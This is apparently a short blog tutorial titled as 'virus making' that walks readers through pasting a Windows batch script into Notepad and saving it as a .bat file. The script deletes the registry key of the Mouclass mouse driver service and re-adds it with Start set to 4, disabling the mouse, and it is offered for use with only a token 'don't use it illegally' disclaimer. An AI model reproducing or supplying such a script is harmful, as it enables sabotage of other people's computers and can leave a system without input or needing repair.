0





Hi friends



I am hare with another virus making tutorial

In this tutorial I am going to tell you that how to make a virus using
Notepad
This virus will simply disable your mouse
How to do???
First open notepad
Then copy the following code in notepad
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system
\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d
4
rem ---------------------------------
Save it with anyname.bat format for example sail.bat
Now your virus is ready use it with your own risk
Note....
This is just a kind of information please don't use it illegally
Thanks.

Post a Comment

 
Top